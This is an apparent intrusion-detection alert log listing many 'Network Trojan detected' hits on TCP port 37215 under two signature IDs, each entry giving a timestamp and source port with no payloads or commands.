                Timestamp:05/29/24-15:15:41.210582
                SID:2829579
                Source Port:33102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969873
                SID:2829579
                Source Port:35688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586731
                SID:2829579
                Source Port:48276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613171
                SID:2829579
                Source Port:59054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.045004
                SID:2829579
                Source Port:57752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182308
                SID:2835222
                Source Port:33974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212308
                SID:2835222
                Source Port:39262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278665
                SID:2835222
                Source Port:50770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848490
                SID:2835222
                Source Port:57364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862952
                SID:2829579
                Source Port:47370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852941
                SID:2835222
                Source Port:56582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864152
                SID:2835222
                Source Port:56102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675412
                SID:2835222
                Source Port:38704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965773
                SID:2829579
                Source Port:43856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791040
                SID:2829579
                Source Port:38794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.794091
                SID:2829579
                Source Port:41278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359602
                SID:2835222
                Source Port:52000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847169
                SID:2835222
                Source Port:57618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133295
                SID:2835222
                Source Port:51204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947188
                SID:2835222
                Source Port:43588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832904
                SID:2835222
                Source Port:34950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.936374
                SID:2835222
                Source Port:51148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987363
                SID:2829579
                Source Port:47080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042856
                SID:2835222
                Source Port:45796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.625015
                SID:2829579
                Source Port:60372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782564
                SID:2835222
                Source Port:55598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859291
                SID:2829579
                Source Port:51346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421147
                SID:2829579
                Source Port:43728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898755
                SID:2829579
                Source Port:36994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712088
                SID:2829579
                Source Port:57946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845420
                SID:2835222
                Source Port:50318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361302
                SID:2829579
                Source Port:39912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001366
                SID:2835222
                Source Port:41590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.846426
                SID:2829579
                Source Port:54456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796697
                SID:2829579
                Source Port:47850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266111
                SID:2829579
                Source Port:43084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597573
                SID:2829579
                Source Port:42832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764200
                SID:2835222
                Source Port:38830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521434
                SID:2835222
                Source Port:44166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840058
                SID:2829579
                Source Port:48552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943909
                SID:2829579
                Source Port:44606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001799
                SID:2835222
                Source Port:33214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.120620
                SID:2835222
                Source Port:50576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380358
                SID:2829579
                Source Port:38576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686834
                SID:2835222
                Source Port:38276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.268519
                SID:2835222
                Source Port:52100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224296
                SID:2829579
                Source Port:55230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583665
                SID:2829579
                Source Port:56084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243363
                SID:2829579
                Source Port:59096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841753
                SID:2829579
                Source Port:39280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971675
                SID:2835222
                Source Port:36862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867541
                SID:2829579
                Source Port:51016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867553
                SID:2835222
                Source Port:35584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526763
                SID:2829579
                Source Port:48892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325878
                SID:2829579
                Source Port:52870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.799753
                SID:2835222
                Source Port:57714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038476
                SID:2829579
                Source Port:44754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.229960
                SID:2829579
                Source Port:43858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226123
                SID:2835222
                Source Port:44034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784571
                SID:2835222
                Source Port:54620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717262
                SID:2829579
                Source Port:53704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498469
                SID:2835222
                Source Port:40294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532045
                SID:2829579
                Source Port:59874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520338
                SID:2829579
                Source Port:36654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668550
                SID:2829579
                Source Port:55386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505422
                SID:2829579
                Source Port:44096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.739023
                SID:2829579
                Source Port:53656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731643
                SID:2829579
                Source Port:38594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263890
                SID:2835222
                Source Port:54584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.073884
                SID:2835222
                Source Port:56590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074613
                SID:2835222
                Source Port:60584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915714
                SID:2829579
                Source Port:42970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180253
                SID:2829579
                Source Port:33786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571593
                SID:2835222
                Source Port:41422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177874
                SID:2829579
                Source Port:34992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915487
                SID:2835222
                Source Port:44036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556750
                SID:2829579
                Source Port:35122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177343
                SID:2829579
                Source Port:56146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.373801
                SID:2835222
                Source Port:34152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359220
                SID:2835222
                Source Port:49232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.615085
                SID:2829579
                Source Port:49318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263743
                SID:2829579
                Source Port:38128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660303
                SID:2835222
                Source Port:47166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512562
                SID:2835222
                Source Port:47634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660437
                SID:2835222
                Source Port:55712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897333
                SID:2829579
                Source Port:40880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965334
                SID:2835222
                Source Port:46078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264911
                SID:2829579
                Source Port:48416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154548
                SID:2835222
                Source Port:48574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332587
                SID:2835222
                Source Port:58794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001388
                SID:2835222
                Source Port:35732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931765
                SID:2829579
                Source Port:41394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567076
                SID:2829579
                Source Port:38272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436737
                SID:2829579
                Source Port:36958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328073
                SID:2829579
                Source Port:39728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266255
                SID:2835222
                Source Port:45472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.617233
                SID:2835222
                Source Port:33308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716392
                SID:2829579
                Source Port:53672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333689
                SID:2829579
                Source Port:53280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987083
                SID:2829579
                Source Port:55256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982504
                SID:2835222
                Source Port:43630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612147
                SID:2829579
                Source Port:51106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848892
                SID:2835222
                Source Port:40782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277169
                SID:2829579
                Source Port:44662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172863
                SID:2835222
                Source Port:36338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438204
                SID:2829579
                Source Port:47822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070322
                SID:2829579
                Source Port:39038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265235
                SID:2835222
                Source Port:39424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166140
                SID:2835222
                Source Port:54526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989950
                SID:2829579
                Source Port:59206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958148
                SID:2835222
                Source Port:33514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994595
                SID:2829579
                Source Port:39890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982901
                SID:2829579
                Source Port:50944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209578
                SID:2829579
                Source Port:43624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519776
                SID:2829579
                Source Port:52284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461282
                SID:2829579
                Source Port:59172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665495
                SID:2835222
                Source Port:59194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.128535
                SID:2829579
                Source Port:55384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871673
                SID:2829579
                Source Port:50452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369281
                SID:2835222
                Source Port:36908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562161
                SID:2829579
                Source Port:52998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782226
                SID:2835222
                Source Port:45050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509754
                SID:2835222
                Source Port:40132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997891
                SID:2835222
                Source Port:56216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640500
                SID:2829579
                Source Port:56456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519015
                SID:2835222
                Source Port:40356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786834
                SID:2829579
                Source Port:50418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612552
                SID:2829579
                Source Port:36494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.718091
                SID:2835222
                Source Port:49896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172690
                SID:2829579
                Source Port:56368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701343
                SID:2829579
                Source Port:34296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324759
                SID:2829579
                Source Port:45998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520184
                SID:2835222
                Source Port:52142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877278
                SID:2829579
                Source Port:34902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948180
                SID:2835222
                Source Port:53788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686787
                SID:2829579
                Source Port:44556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154867
                SID:2835222
                Source Port:35390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618540
                SID:2829579
                Source Port:54124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885902
                SID:2835222
                Source Port:45632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686842
                SID:2829579
                Source Port:59696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981970
                SID:2835222
                Source Port:52506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669545
                SID:2829579
                Source Port:36954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895867
                SID:2835222
                Source Port:53110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931234
                SID:2829579
                Source Port:60642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935778
                SID:2835222
                Source Port:39022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644871
                SID:2835222
                Source Port:52398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501561
                SID:2835222
                Source Port:54112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.920974
                SID:2829579
                Source Port:33868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.621014
                SID:2829579
                Source Port:57026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.622053
                SID:2829579
                Source Port:59772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.358696
                SID:2829579
                Source Port:50276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.034047
                SID:2829579
                Source Port:34636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.564995
                SID:2829579
                Source Port:57626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629071
                SID:2829579
                Source Port:37386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776654
                SID:2829579
                Source Port:33642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076657
                SID:2829579
                Source Port:51844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.242935
                SID:2829579
                Source Port:32898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466305
                SID:2829579
                Source Port:51292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520657
                SID:2835222
                Source Port:47542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.936452
                SID:2829579
                Source Port:58904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038226
                SID:2829579
                Source Port:44654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243560
                SID:2829579
                Source Port:43800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727326
                SID:2835222
                Source Port:49926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931809
                SID:2829579
                Source Port:49818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008614
                SID:2829579
                Source Port:46942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791447
                SID:2829579
                Source Port:44400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385742
                SID:2829579
                Source Port:40332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809433
                SID:2835222
                Source Port:43380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227823
                SID:2835222
                Source Port:45962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842106
                SID:2829579
                Source Port:35062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.338931
                SID:2835222
                Source Port:55486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666544
                SID:2835222
                Source Port:60266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840346
                SID:2829579
                Source Port:51232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559816
                SID:2835222
                Source Port:49012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928548
                SID:2829579
                Source Port:58002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.897998
                SID:2835222
                Source Port:35566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.104856
                SID:2829579
                Source Port:36310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942552
                SID:2835222
                Source Port:57550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896360
                SID:2835222
                Source Port:35356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611159
                SID:2829579
                Source Port:47756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665413
                SID:2835222
                Source Port:44934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.656655
                SID:2829579
                Source Port:47122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227227
                SID:2835222
                Source Port:60994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328240
                SID:2829579
                Source Port:58230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072606
                SID:2829579
                Source Port:56884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.451320
                SID:2835222
                Source Port:45938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013423
                SID:2829579
                Source Port:34426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.548690
                SID:2829579
                Source Port:38746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444495
                SID:2829579
                Source Port:54910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336458
                SID:2835222
                Source Port:58078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628687
                SID:2835222
                Source Port:55396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555452
                SID:2829579
                Source Port:45582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.334706
                SID:2835222
                Source Port:59732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026537
                SID:2835222
                Source Port:59554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910821
                SID:2835222
                Source Port:60716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730747
                SID:2835222
                Source Port:48866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.234085
                SID:2835222
                Source Port:44276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860781
